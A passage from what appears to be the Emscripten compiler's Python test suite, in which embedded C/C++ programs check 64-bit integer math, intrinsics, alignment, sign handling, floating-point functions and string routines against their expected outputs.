while ((UINT64)testu32a * (UINT64)bigu32 < testu64a) {
printf("testu64a is %llu\n", testu64a);
testu64a /= 2;
}
return 0;
}
'''
self.do_run(src, 'testu64a is 14746250828952703000\n')
def test_i64_precise(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <inttypes.h>
#include <stdio.h>
int main() {
uint64_t x = 0, y = 0;
for (int i = 0; i < 64; i++) {
x += 1ULL << i;
y += x;
x /= 3;
y *= 5;
printf("unsigned %d: %llu,%llu,%llu,%llu,%llu,%llu,%llu,%llu,%llu\n", i, x, y, x+y, x-y, x*y, y ? x/y : 0, x ? y/x : 0, y ? x%y : 0, x ? y%x : 0);
}
int64_t x2 = 0, y2 = 0;
for (int i = 0; i < 64; i++) {
x2 += 1LL << i;
y2 += x2;
x2 /= 3 * (i % 7 ? -1 : 1);
y2 *= 5 * (i % 2 ? -1 : 1);
printf("signed %d: %lld,%lld,%lld,%lld,%lld,%lld,%lld,%lld,%lld\n", i, x2, y2, x2+y2, x2-y2, x2*y2, y2 ? x2/y2 : 0, x2 ? y2/x2 : 0, y2 ? x2%y2 : 0, x2 ? y2%x2 : 0);
}
return 0;
}
'''
self.do_run(src, open(path_from_root('tests', 'i64_precise.txt')).read())
# Verify that even if we ask for precision, if it is not needed it is not included
Settings.PRECISE_I64_MATH = 1
src = '''
#include <inttypes.h>
#include <stdio.h>
int main(int argc, char **argv) {
uint64_t x = 2125299906845564, y = 1225891506842664;
if (argc == 12) {
x = x >> 1;
y = y >> 1;
}
x = x & 12ULL;
y = y | 12ULL;
x = x ^ y;
x <<= 2;
y >>= 3;
printf("*%llu, %llu*\\n", x, y);
}
'''
self.do_run(src, '*4903566027370624, 153236438355333*')
code = open(os.path.join(self.get_dir(), 'src.cpp.o.js')).read()
assert 'goog.math.Long' not in code, 'i64 precise math should not have been included if not actually used'
# But if we force it to be included, it is. First, a case where we don't need it
Settings.PRECISE_I64_MATH = 2
self.do_run(open(path_from_root('tests', 'hello_world.c')).read(), 'hello')
code = open(os.path.join(self.get_dir(), 'src.cpp.o.js')).read()
assert 'goog.math.Long' in code, 'i64 precise math should be included if forced'
# and now one where we do
self.do_run(r'''
#include <stdio.h>
int main( int argc, char ** argv )
{
unsigned long a = 0x60DD1695U;
unsigned long b = 0xCA8C4E7BU;
unsigned long long c = (unsigned long long)a * b;
printf( "c = %016llx\n", c );
return 0;
}
''', 'c = 4ca38a6bd2973f97')
def test_i64_llabs(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
Settings.PRECISE_I64_MATH = 2
self.do_run(r'''
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char ** argv) {
printf("%lld,%lld\n", llabs(-576460752303423489), llabs(576460752303423489));
return 0;
}
''', '576460752303423489,576460752303423489')
def test_i64_zextneg(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <stdint.h>
#include <stdio.h>
int main(int argc, char *argv[])
{
uint8_t byte = 0x80;
uint16_t two = byte;
uint32_t four = byte;
uint64_t eight = byte;
printf("value: %d,%d,%d,%lld.\n", byte, two, four, eight);
return 0;
}
'''
self.do_run(src, 'value: 128,128,128,128.')
def test_i64_7z(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <stdint.h>
#include <stdio.h>
uint64_t a, b;
int main(int argc, char *argv[])
{
a = argc;
b = argv[1][0];
printf("%d,%d\n", a, b);
if (a > a + b || a > a + b + 1) {
printf("one %lld, %lld", a, b);
return 0;
}
printf("zero %lld, %lld", a, b);
return 0;
}
'''
self.do_run(src, 'zero 2, 104', ['hallo'])
def test_i64_i16(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <stdint.h>
#include <stdio.h>
int main(int argc, char ** argv){
int y=-133;
int64_t x= ((int64_t)((short)(y)))*(100 + argc);
if(x>0)
printf(">0\n");
else
printf("<=0\n");
}
'''
self.do_run(src, '<=0')
def test_i64_qdouble(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <stdio.h>
typedef long long qint64; /* 64 bit signed */
typedef double qreal;
int main(int argc, char **argv)
{
qreal c = 111;
qint64 d = -111 + (argc - 1);
c += d;
if (c < -1 || c > 1)
{
printf("Failed!\n");
}
else
{
printf("Succeeded!\n");
}
};
'''
self.do_run(src, 'Succeeded!')
def test_i64_varargs(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <stdio.h>
#include <stdint.h>
#include <stdarg.h>
int64_t ccv_cache_generate_signature(char *msg, int len, int64_t sig_start, ...) {
if (sig_start < 10123)
printf("%s\n", msg+len);
va_list v;
va_start(v, sig_start);
if (sig_start > 1413)
printf("%d\n", va_arg(v, int));
else
printf("nada\n");
va_end(v);
return len*sig_start*(msg[0]+1);
}
int main(int argc, char **argv)
{
for (int i = 0; i < argc; i++) {
int64_t x;
if (i % 123123 == 0)
x = ccv_cache_generate_signature(argv[i], i+2, (int64_t)argc*argc, 54.111);
else
x = ccv_cache_generate_signature(argv[i], i+2, (int64_t)argc*argc, 13);
printf("%lld\n", x);
}
};
'''
self.do_run(src, '''in/this.program
nada
1536
a
nada
5760
fl
nada
6592
sdfasdfasdf
nada
7840
''', 'waka fleefl asdfasdfasdfasdf'.split(' '))
def test_i32_mul_precise(self):
if self.emcc_args == None: return self.skip('needs ta2')
src = r'''
#include <stdio.h>
int main(int argc, char **argv) {
unsigned long d1 = 0x847c9b5d;
unsigned long q = 0x549530e1;
if (argc > 1000) { q += argc; d1 -= argc; } // confuse optimizer
printf("%lu\n", d1*q);
return 0;
}
'''
self.do_run(src, '3217489085')
def test_i32_mul_semiprecise(self):
if Settings.ASM_JS: return self.skip('asm is always fully precise')
Settings.PRECISE_I32_MUL = 0 # we want semiprecise here
src = r'''
#include <stdio.h>
typedef unsigned int uint;
// from cube2, zlib licensed
#define N (624)
#define M (397)
#define K (0x9908B0DFU)
static uint state[N];
static int next = N;
void seedMT(uint seed)
{
state[0] = seed;
for(uint i = 1; i < N; i++) // if we do not do this precisely, at least we should coerce to int immediately, not wait
state[i] = seed = 1812433253U * (seed ^ (seed >> 30)) + i;
next = 0;
}
int main() {
seedMT(5497);
for (int i = 0; i < 10; i++) printf("%d: %u\n", i, state[i]);
return 0;
}
'''
self.do_run(src, '''0: 5497
1: 2916432318
2: 2502517762
3: 3151524867
4: 2323729668
5: 2053478917
6: 2409490438
7: 848473607
8: 691103752
9: 3915535113
''')
def test_i16_emcc_intrinsic(self):
Settings.CORRECT_SIGNS = 1 # Relevant to this test
src = r'''
#include <stdio.h>
int test(unsigned short a, unsigned short b) {
unsigned short result = a;
result += b;
if (result < b) printf("C!");
return result;
}
int main(void) {
printf(",%d,", test(0, 0));
printf(",%d,", test(1, 1));
printf(",%d,", test(65535, 1));
printf(",%d,", test(1, 65535));
printf(",%d,", test(32768, 32767));
printf(",%d,", test(32768, 32768));
return 0;
}
'''
self.do_run(src, ',0,,2,C!,0,C!,0,,65535,C!,0,')
def test_negative_zero(self):
src = r'''
#include <stdio.h>
#include <math.h>
int main() {
#define TEST(x, y) \
printf("%.2f, %.2f ==> %.2f\n", x, y, copysign(x, y));
TEST( 5.0f, 5.0f);
TEST( 5.0f, -5.0f);
TEST(-5.0f, 5.0f);
TEST(-5.0f, -5.0f);
TEST( 5.0f, 4.0f);
TEST( 5.0f, -4.0f);
TEST(-5.0f, 4.0f);
TEST(-5.0f, -4.0f);
TEST( 0.0f, 5.0f);
TEST( 0.0f, -5.0f);
TEST(-0.0f, 5.0f);
TEST(-0.0f, -5.0f);
TEST( 5.0f, 0.0f);
TEST( 5.0f, -0.0f);
TEST(-5.0f, 0.0f);
TEST(-5.0f, -0.0f);
TEST( 0.0f, 0.0f);
TEST( 0.0f, -0.0f);
TEST(-0.0f, 0.0f);
TEST(-0.0f, -0.0f);
return 0;
}
'''
self.do_run(src, '''5.00, 5.00 ==> 5.00
5.00, -5.00 ==> -5.00
-5.00, 5.00 ==> 5.00
-5.00, -5.00 ==> -5.00
5.00, 4.00 ==> 5.00
5.00, -4.00 ==> -5.00
-5.00, 4.00 ==> 5.00
-5.00, -4.00 ==> -5.00
0.00, 5.00 ==> 0.00
0.00, -5.00 ==> -0.00
-0.00, 5.00 ==> 0.00
-0.00, -5.00 ==> -0.00
5.00, 0.00 ==> 5.00
5.00, -0.00 ==> -5.00
-5.00, 0.00 ==> 5.00
-5.00, -0.00 ==> -5.00
0.00, 0.00 ==> 0.00
0.00, -0.00 ==> -0.00
-0.00, 0.00 ==> 0.00
-0.00, -0.00 ==> -0.00
''')
def test_llvm_intrinsics(self):
if self.emcc_args == None: return self.skip('needs ta2')
Settings.PRECISE_I64_MATH = 2 # for bswap64
src = r'''
#include <stdio.h>
#include <sys/types.h>
extern "C" {
extern unsigned short llvm_bswap_i16(unsigned short x);
extern unsigned int llvm_bswap_i32(unsigned int x);
extern int32_t llvm_ctlz_i32(int32_t x);
extern int64_t llvm_ctlz_i64(int64_t x);
extern int32_t llvm_cttz_i32(int32_t x);
extern int64_t llvm_cttz_i64(int64_t x);
extern int32_t llvm_ctpop_i32(int32_t x);
extern int64_t llvm_ctpop_i64(int64_t x);
extern int llvm_expect_i32(int x, int y);
}
int main(void) {
unsigned short x = 0xc8ef;
printf("%x,%x\n", x&0xff, x >> 8);
x = llvm_bswap_i16(x);
printf("%x,%x\n", x&0xff, x >> 8);
unsigned int y = 0xc5de158a;
printf("%x,%x,%x,%x\n", y&0xff, (y>>8)&0xff, (y>>16)&0xff, (y>>24)&0xff);
y = llvm_bswap_i32(y);
printf("%x,%x,%x,%x\n", y&0xff, (y>>8)&0xff, (y>>16)&0xff, (y>>24)&0xff);
printf("%d,%d\n", (int)llvm_ctlz_i64(((int64_t)1) << 40), llvm_ctlz_i32(1<<10));
printf("%d,%d\n", (int)llvm_cttz_i64(((int64_t)1) << 40), llvm_cttz_i32(1<<10));
printf("%d,%d\n", (int)llvm_ctpop_i64((0x3101ULL << 32) | 1), llvm_ctpop_i32(0x3101));
printf("%d\n", (int)llvm_ctpop_i32(-594093059));
printf("%d\n", llvm_expect_i32(x % 27, 3));
int64_t a = 1;
a = __builtin_bswap64(a);
printf("%lld\n", a);
return 0;
}
'''
self.do_run(src, '''ef,c8
c8,ef
8a,15,de,c5
c5,de,15,8a
23,21
40,10
5,4
22
13
72057594037927936
''')
def test_bswap64(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('needs ta2')
src = r'''
#include <stdio.h>
#include <stdlib.h>
#include <iostream>
#include <string>
#include <sstream>
typedef unsigned long long quint64;
using namespace std;
inline quint64 qbswap(quint64 source)
{
return 0
| ((source & quint64(0x00000000000000ffLL)) << 56)
| ((source & quint64(0x000000000000ff00LL)) << 40)
| ((source & quint64(0x0000000000ff0000LL)) << 24)
| ((source & quint64(0x00000000ff000000LL)) << 8)
| ((source & quint64(0x000000ff00000000LL)) >> 8)
| ((source & quint64(0x0000ff0000000000LL)) >> 24)
| ((source & quint64(0x00ff000000000000LL)) >> 40)
| ((source & quint64(0xff00000000000000LL)) >> 56);
}
int main()
{
quint64 v = strtoull("4433ffeeddccbb00", NULL, 16);
printf("%lld\n", v);
const string string64bitInt = "4433ffeeddccbb00";
stringstream s(string64bitInt);
quint64 int64bitInt = 0;
printf("1\n");
s >> hex >> int64bitInt;
printf("2\n");
stringstream out;
out << hex << qbswap(int64bitInt);
cout << out.str() << endl;
cout << hex << int64bitInt << endl;
cout << string64bitInt << endl;
if (out.str() != "bbccddeeff3344")
{
cout << "Failed!" << endl;
}
else
{
cout << "Succeeded!" << endl;
}
return 0;
}
'''
self.do_run(src, '''4914553019779824384
1
2
bbccddeeff3344
4433ffeeddccbb00
4433ffeeddccbb00
Succeeded!
''')
def test_sha1(self):
if self.emcc_args == None: return self.skip('needs ta2')
self.do_run(open(path_from_root('tests', 'sha1.c')).read(), 'SHA1=15dd99a1991e0b3826fede3deffc1feba42278e6')
def test_cube2md5(self):
if self.emcc_args == None: return self.skip('needs emcc')
self.emcc_args += ['--embed-file', 'cube2md5.txt']
shutil.copyfile(path_from_root('tests', 'cube2md5.txt'), os.path.join(self.get_dir(), 'cube2md5.txt'))
self.do_run(open(path_from_root('tests', 'cube2md5.cpp')).read(), open(path_from_root('tests', 'cube2md5.ok')).read())
def test_cube2hash(self):
try:
old_chunk_size = os.environ.get('EMSCRIPT_MAX_CHUNK_SIZE') or ''
os.environ['EMSCRIPT_MAX_CHUNK_SIZE'] = '1' # test splitting out each function to a chunk in emscripten.py (21 functions here)
# A good test of i64 math
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('requires ta2 C-style memory aliasing')
self.do_run('', 'Usage: hashstring <seed>',
libraries=self.get_library('cube2hash', ['cube2hash.bc'], configure=None),
includes=[path_from_root('tests', 'cube2hash')])
for text, output in [('fleefl', '892BDB6FD3F62E863D63DA55851700FDE3ACF30204798CE9'),
('fleefl2', 'AA2CC5F96FC9D540CA24FDAF1F71E2942753DB83E8A81B61'),
('64bitisslow', '64D8470573635EC354FEE7B7F87C566FCAF1EFB491041670')]:
self.do_run('', 'hash value: ' + output, [text], no_build=True)
finally:
os.environ['EMSCRIPT_MAX_CHUNK_SIZE'] = old_chunk_size
def test_unaligned(self):
if Settings.QUANTUM_SIZE == 1: return self.skip('No meaning to unaligned addresses in q1')
src = r'''
#include<stdio.h>
struct S {
double x;
int y;
};
int main() {
// the 64-bit value here will not be 8-byte aligned
S s0[3] = { {0x12a751f430142, 22}, {0x17a5c85bad144, 98}, {1, 1}};
char buffer[10*sizeof(S)];
int b = int(buffer);
S *s = (S*)(b + 4-b%8);
s[0] = s0[0];
s[1] = s0[1];
s[2] = s0[2];
printf("*%d : %d : %d\n", sizeof(S), ((unsigned int)&s[0]) % 8 != ((unsigned int)&s[1]) % 8,
((unsigned int)&s[1]) - ((unsigned int)&s[0]));
s[0].x++;
s[0].y++;
s[1].x++;
s[1].y++;
printf("%.1f,%d,%.1f,%d\n", s[0].x, s[0].y, s[1].x, s[1].y);
return 0;
}
'''
# TODO: A version of this with int64s as well
if self.is_le32():
return self.skip('LLVM marks the reads of s as fully aligned, making this test invalid')
else:
self.do_run(src, '*12 : 1 : 12\n328157500735811.0,23,416012775903557.0,99\n')
return # TODO: continue to the next part here
# Test for undefined behavior in C. This is not legitimate code, but does exist
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('No meaning to unaligned addresses without t2')
src = r'''
#include <stdio.h>
int main()
{
int x[10];
char *p = (char*)&x[0];
p++;
short *q = (short*)p;
*q = 300;
printf("*%d:%d*\n", *q, ((int)q)%2);
int *r = (int*)p;
*r = 515559;
printf("*%d*\n", *r);
long long *t = (long long*)p;
*t = 42949672960;
printf("*%Ld*\n", *t);
return 0;
}
'''
try:
self.do_run(src, '*300:1*\n*515559*\n*42949672960*\n')
except Exception, e:
assert 'must be aligned' in str(e), e # expected to fail without emulation
def test_align64(self):
src = r'''
#include <stdio.h>
// inspired by poppler
enum Type {
A = 10,
B = 20
};
struct Object {
Type type;
union {
int intg;
double real;
char *name;
};
};
struct Principal {
double x;
Object a;
double y;
};
int main(int argc, char **argv)
{
int base = argc-1;
Object *o = NULL;
printf("%d,%d\n", sizeof(Object), sizeof(Principal));
printf("%d,%d,%d,%d\n", (int)&o[base].type, (int)&o[base].intg, (int)&o[base].real, (int)&o[base].name);
printf("%d,%d,%d,%d\n", (int)&o[base+1].type, (int)&o[base+1].intg, (int)&o[base+1].real, (int)&o[base+1].name);
Principal p, q;
p.x = p.y = q.x = q.y = 0;
p.a.type = A;
p.a.real = 123.456;
*(&q.a) = p.a;
printf("%.2f,%d,%.2f,%.2f : %.2f,%d,%.2f,%.2f\n", p.x, p.a.type, p.a.real, p.y, q.x, q.a.type, q.a.real, q.y);
return 0;
}
'''
if self.is_le32():
self.do_run(src, '''16,32
0,8,8,8
16,24,24,24
0.00,10,123.46,0.00 : 0.00,10,123.46,0.00
''')
else:
self.do_run(src, '''12,28
0,4,4,4
12,16,16,16
0.00,10,123.46,0.00 : 0.00,10,123.46,0.00
''')
def test_unsigned(self):
Settings.CORRECT_SIGNS = 1 # We test for exactly this sort of thing here
Settings.CHECK_SIGNS = 0
src = '''
#include <stdio.h>
const signed char cvals[2] = { -1, -2 }; // compiler can store this is a string, so -1 becomes \FF, and needs re-signing
int main()
{
{
unsigned char x = 200;
printf("*%d*\\n", x);
unsigned char y = -22;
printf("*%d*\\n", y);
}
int varey = 100;
unsigned int MAXEY = -1, MAXEY2 = -77;
printf("*%u,%d,%u*\\n", MAXEY, varey >= MAXEY, MAXEY2); // 100 >= -1? not in unsigned!
int y = cvals[0];
printf("*%d,%d,%d,%d*\\n", cvals[0], cvals[0] < 0, y, y < 0);
y = cvals[1];
printf("*%d,%d,%d,%d*\\n", cvals[1], cvals[1] < 0, y, y < 0);
// zext issue - see mathop in jsifier
unsigned char x8 = -10;
unsigned long hold = 0;
hold += x8;
int y32 = hold+50;
printf("*%u,%u*\\n", hold, y32);
// Comparisons
x8 = 0;
for (int i = 0; i < 254; i++) x8++; // make it an actual 254 in JS - not a -2
printf("*%d,%d*\\n", x8+1 == 0xff, x8+1 != 0xff); // 0xff may be '-1' in the bitcode
return 0;
}
'''
self.do_run(src, '*4294967295,0,4294967219*\n*-1,1,-1,1*\n*-2,1,-2,1*\n*246,296*\n*1,0*')
# Now let's see some code that should just work in USE_TYPED_ARRAYS == 2, but requires
# corrections otherwise
if Settings.USE_TYPED_ARRAYS == 2:
Settings.CORRECT_SIGNS = 0
Settings.CHECK_SIGNS = 1 if not Settings.ASM_JS else 0
else:
Settings.CORRECT_SIGNS = 1
Settings.CHECK_SIGNS = 0
src = '''
#include <stdio.h>
int main()
{
{
unsigned char x;
unsigned char *y = &x;
*y = -1;
printf("*%d*\\n", x);
}
{
unsigned short x;
unsigned short *y = &x;
*y = -1;
printf("*%d*\\n", x);
}
/*{ // This case is not checked. The hint for unsignedness is just the %u in printf, and we do not analyze that
unsigned int x;
unsigned int *y = &x;
*y = -1;
printf("*%u*\\n", x);
}*/
{
char x;
char *y = &x;
*y = 255;
printf("*%d*\\n", x);
}
{
char x;
char *y = &x;
*y = 65535;
printf("*%d*\\n", x);
}
{
char x;
char *y = &x;
*y = 0xffffffff;
printf("*%d*\\n", x);
}
return 0;
}
'''
self.do_run(src, '*255*\n*65535*\n*-1*\n*-1*\n*-1*')
def test_bitfields(self):
if self.emcc_args is None: Settings.SAFE_HEAP = 0 # bitfields do loads on invalid areas, by design
src = '''
#include <stdio.h>
struct bitty {
unsigned x : 1;
unsigned y : 1;
unsigned z : 1;
};
int main()
{
bitty b;
printf("*");
for (int i = 0; i <= 1; i++)
for (int j = 0; j <= 1; j++)
for (int k = 0; k <= 1; k++) {
b.x = i;
b.y = j;
b.z = k;
printf("%d,%d,%d,", b.x, b.y, b.z);
}
printf("*\\n");
return 0;
}
'''
self.do_run(src, '*0,0,0,0,0,1,0,1,0,0,1,1,1,0,0,1,0,1,1,1,0,1,1,1,*')
def test_floatvars(self):
src = '''
#include <stdio.h>
// headers test, see issue #1013
#include<cfloat>
#include<cmath>
int main(int argc, char **argv)
{
float x = 1.234, y = 3.5, q = 0.00000001;
y *= 3;
int z = x < y;
printf("*%d,%d,%.1f,%d,%.4f,%.2f*\\n", z, int(y), y, (int)x, x, q);
printf("%.2f, %.2f, %.2f, %.2f\\n", fmin(0.5, 3.3), fmin(NAN, 3.3), fmax(0.5, 3.3), fmax(NAN, 3.3));
printf("small: %.10f\\n", argc * 0.000001);
/*
// Rounding behavior
float fs[6] = { -2.75, -2.50, -2.25, 2.25, 2.50, 2.75 };
double ds[6] = { -2.75, -2.50, -2.25, 2.25, 2.50, 2.75 };
for (int i = 0; i < 6; i++)
printf("*int(%.2f)=%d,%d*\\n", fs[i], int(fs[i]), int(ds[i]));
*/
return 0;
}
'''
self.do_run(src, '*1,10,10.5,1,1.2340,0.00*\n0.50, 3.30, 3.30, 3.30\nsmall: 0.0000010000\n')
def test_isnan(self):
src = r'''
#include <stdio.h>
int IsNaN(double x){
int rc; /* The value return */
volatile double y = x;
volatile double z = y;
rc = (y!=z);
return rc;
}
int main() {
double tests[] = { 1.0, 3.333, 1.0/0.0, 0.0/0.0, -1.0/0.0, -0, 0, -123123123, 12.0E200 };
for (int i = 0; i < sizeof(tests)/sizeof(double); i++)
printf("%d - %f - %d\n", i, tests[i], IsNaN(tests[i]));
}
'''
self.do_run(src, '''0 - 1.000000 - 0
1 - 3.333000 - 0
2 - inf - 0
3 - nan - 1
4 - -inf - 0
5 - 0.000000 - 0
6 - 0.000000 - 0
7 - -123123123.000000 - 0
8 - 1.2e+201 - 0
''')
def test_globaldoubles(self):
src = r'''
#include <stdlib.h>
#include <stdio.h>
double testVu, testVv, testWu, testWv;
void Test(double _testVu, double _testVv, double _testWu, double _testWv)
{
testVu = _testVu;
testVv = _testVv;
testWu = _testWu;
testWv = _testWv;
printf("BUG?\n");
printf("Display: Vu=%f Vv=%f Wu=%f Wv=%f\n", testVu, testVv, testWu, testWv);
}
int main(void)
{
double v1 = 465.1;
double v2 = 465.2;
double v3 = 160.3;
double v4 = 111.4;
Test(v1, v2, v3, v4);
return 0;
}
'''
self.do_run(src, 'BUG?\nDisplay: Vu=465.100000 Vv=465.200000 Wu=160.300000 Wv=111.400000')
def test_math(self):
src = '''
#include <stdio.h>
#include <stdlib.h>
#include <cmath>
int main()
{
printf("*%.2f,%.2f,%d", M_PI, -M_PI, (1/0.0) > 1e300); // could end up as infinity, or just a very very big number
printf(",%d", isfinite(NAN) != 0);
printf(",%d", isfinite(INFINITY) != 0);
printf(",%d", isfinite(-INFINITY) != 0);
printf(",%d", isfinite(12.3) != 0);
printf(",%d", isinf(NAN) != 0);
printf(",%d", isinf(INFINITY) != 0);
printf(",%d", isinf(-INFINITY) != 0);
printf(",%d", isinf(12.3) != 0);
div_t div_result = div(23, 10);
printf(",%d", div_result.quot);
printf(",%d", div_result.rem);
double sine = -1.0, cosine = -1.0;
sincos(0.0, &sine, &cosine);
printf(",%1.1lf", sine);
printf(",%1.1lf", cosine);
float fsine = -1.0f, fcosine = -1.0f;
sincosf(0.0, &fsine, &fcosine);
printf(",%1.1f", fsine);
printf(",%1.1f", fcosine);
printf("*\\n");
return 0;
}
'''
self.do_run(src, '*3.14,-3.14,1,0,0,0,1,0,1,1,0,2,3,0.0,1.0,0.0,1.0*')
def test_erf(self):
src = '''
#include <math.h>
#include <stdio.h>
int main()
{
printf("%1.6f, %1.6f, %1.6f, %1.6f, %1.6f, %1.6f\\n",
erf(1.0),
erf(3.0),
erf(-1.0),
erfc(1.0),
erfc(3.0),
erfc(-1.5));
return 0;
}
'''
self.do_run(src, '0.842701, 0.999978, -0.842701, 0.157299, 0.000022, 1.966105')
def test_math_hyperbolic(self):
src = open(path_from_root('tests', 'hyperbolic', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'hyperbolic', 'output.txt'), 'r').read()
self.do_run(src, expected)
def test_frexp(self):
src = '''
#include <stdio.h>
#include <math.h>
#include <assert.h>
static const double tol=1e-16;
void test_value(double value)
{
int exponent;
double x=frexp(value, &exponent);
double expected=x*pow(2.0, exponent);
printf("%f=%f*2^%d\\n", value, x, exponent);
assert(fabs(expected-value)<tol);
assert(x==0 || (fabs(x)>=5e-1 && fabs(x)<1)); // x has a magnitude in the interval [1/2, 1)
}
int main()
{
test_value(0);
test_value(100.1);
test_value(-100.1);
test_value(.5);
test_value(-.5);
test_value(1-1e-16);
test_value(-(1-1e-16));
return 0;
}
'''
self.do_run(src, '''0.000000=0.000000*2^0
100.100000=0.782031*2^7
-100.100000=-0.782031*2^7
0.500000=0.500000*2^0
-0.500000=-0.500000*2^0
1.000000=1.000000*2^0
-1.000000=-1.000000*2^0''')
def test_rounding(self):
src = '''
#include <stdio.h>
#include <math.h>
int main()
{
printf("%.1f ", round(1.4));
printf("%.1f ", round(1.6));
printf("%.1f ", round(-1.4));
printf("%.1f ", round(-1.6));
printf("%.1f ", round(1.5));
printf("%.1f ", round(2.5));
printf("%.1f ", round(-1.5));
printf("%.1f ", round(-2.5));
printf("%ld ", lrint(1.4));
printf("%ld ", lrint(1.6));
printf("%ld ", lrint(-1.4));
printf("%ld ", lrint(-1.6));
printf("%ld ", lrint(1.5));
printf("%ld ", lrint(2.5));
printf("%ld ", lrint(-1.5));
printf("%ld ", lrint(-2.5));
return 0;
}
'''
self.do_run(src, "1.0 2.0 -1.0 -2.0 2.0 3.0 -2.0 -3.0 "
"1 2 -1 -2 2 2 -2 -2")
def test_llrint(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('requires ta2')
src = r'''
#include <stdio.h>
#include <math.h>
int main() {
printf("%lld\n%lld\n%lld\n%lld\n", llrint(0.1), llrint(0.6), llrint(1.25), llrint(1099511627776.667));
return 0;
}
'''
self.do_run(src, '0\n1\n1\n1099511627777\n')
def test_getgep(self):
# Generated code includes getelementptr (getelementptr, 0, 1), i.e., GEP as the first param to GEP
src = '''
#include <stdio.h>
struct {
int y[10];
int z[10];
} commonblock;
int main()
{
for (int i = 0; i < 10; ++i) {
commonblock.y[i] = 1;
commonblock.z[i] = 2;
}
printf("*%d %d*\\n", commonblock.y[0], commonblock.z[0]);
return 0;
}
'''
self.do_run(src, '*1 2*')
def test_multiply_defined_symbols(self):
a1 = "int f() { return 1; }"
a1_name = os.path.join(self.get_dir(), 'a1.c')
open(a1_name, 'w').write(a1)
a2 = "void x() {}"
a2_name = os.path.join(self.get_dir(), 'a2.c')
open(a2_name, 'w').write(a2)
b1 = "int f() { return 2; }"
b1_name = os.path.join(self.get_dir(), 'b1.c')
open(b1_name, 'w').write(b1)
b2 = "void y() {}"
b2_name = os.path.join(self.get_dir(), 'b2.c')
open(b2_name, 'w').write(b2)
main = r'''
#include <stdio.h>
int f();
int main() {
printf("result: %d\n", f());
return 0;
}
'''
main_name = os.path.join(self.get_dir(), 'main.c')
open(main_name, 'w').write(main)
Building.emcc(a1_name)
Building.emcc(a2_name)
Building.emcc(b1_name)
Building.emcc(b2_name)
Building.emcc(main_name)
liba_name = os.path.join(self.get_dir(), 'liba.a')
Building.emar('cr', liba_name, [a1_name + '.o', a2_name + '.o'])
libb_name = os.path.join(self.get_dir(), 'libb.a')
Building.emar('cr', libb_name, [b1_name + '.o', b2_name + '.o'])
all_name = os.path.join(self.get_dir(), 'all.bc')
Building.link([main_name + '.o', liba_name, libb_name], all_name)
self.do_ll_run(all_name, 'result: 1')
def test_if(self):
src = '''
#include <stdio.h>
int main()
{
int x = 5;
if (x > 3) {
printf("*yes*\\n");
}
return 0;
}
'''
self.do_run(src, '*yes*')
def test_if_else(self):
src = '''
#include <stdio.h>
int main()
{
int x = 5;
if (x > 10) {
printf("*yes*\\n");
} else {
printf("*no*\\n");
}
return 0;
}
'''
self.do_run(src, '*no*')
def test_loop(self):
src = '''
#include <stdio.h>
int main()
{
int x = 5;
for (int i = 0; i < 6; i++) {
x += x*i;
if (x > 1000) {
if (x % 7 == 0) printf("cheez\\n");
x /= 2;
break;
}
}
printf("*%d*\\n", x);
return 0;
}
'''
self.do_run(src, '*1800*')
generated = open('src.cpp.o.js', 'r').read()
def test_stack(self):
Settings.INLINING_LIMIT = 50
src = '''
#include <stdio.h>
int test(int i) {
int x = 10;
if (i > 0) {
return test(i-1);
}
return int(&x); // both for the number, and forces x to not be nativized
}
int main(int argc, char **argv)
{
// We should get the same value for the first and last - stack has unwound
int x1 = test(argc - 2);
int x2 = test(100);
int x3 = test((argc - 2) / 4);
printf("*%d,%d*\\n", x3-x1, x2 != x1);
return 0;
}
'''
self.do_run(src, '*0,1*')
def test_strings(self):
src = '''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv)
{
int x = 5, y = 9, magic = 7; // fool compiler with magic
memmove(&x, &y, magic-7); // 0 should not crash us
int xx, yy, zz;
char s[32];
int cc = sscanf("abc_10.b1_xyz_543_defg", "abc_%d.%2x_xyz_%3d_%3s", &xx, &yy, &zz, s);
printf("%d:%d,%d,%d,%s\\n", cc, xx, yy, zz, s);
printf("%d\\n", argc);
puts(argv[1]);
puts(argv[2]);
printf("%d\\n", atoi(argv[3])+2);
const char *foolingthecompiler = "\\rabcd";
printf("%d\\n", strlen(foolingthecompiler)); // Tests parsing /0D in llvm - should not be a 0 (end string) then a D!
printf("%s\\n", NULL); // Should print '(null)', not the string at address 0, which is a real address for us!
printf("/* a comment */\\n"); // Should not break the generated code!
printf("// another\\n"); // Should not break the generated code!
char* strdup_val = strdup("test");
printf("%s\\n", strdup_val);
free(strdup_val);
{
char *one = "one 1 ONE !";
char *two = "two 2 TWO ?";
char three[1024];
memset(three, '.', 1024);
three[50] = 0;
strncpy(three + argc, one + (argc/2), argc+1);
strncpy(three + argc*3, two + (argc/3), argc+2);
printf("waka %s\\n", three);
}
{
char *one = "string number one top notch";
char *two = "fa la sa ho fi FI FO FUM WHEN WHERE WHY HOW WHO";
char three[1000];
strcpy(three, &one[argc*2]);
char *four = strcat(three, &two[argc*3]);
printf("cat |%s|\\n", three);
printf("returned |%s|\\n", four);
}
return 0;
}
'''
for named in (0, 1):
print named
Settings.NAMED_GLOBALS = named
self.do_run(src, '''4:10,177,543,def\n4\nwowie\ntoo\n76\n5\n(null)\n/* a comment */\n// another\ntest\nwaka ....e 1 O...wo 2 T................................
cat |umber one top notchfi FI FO FUM WHEN WHERE WHY HOW WHO|
returned |umber one top notchfi FI FO FUM WHEN WHERE WHY HOW WHO|''', ['wowie', 'too', '74'])
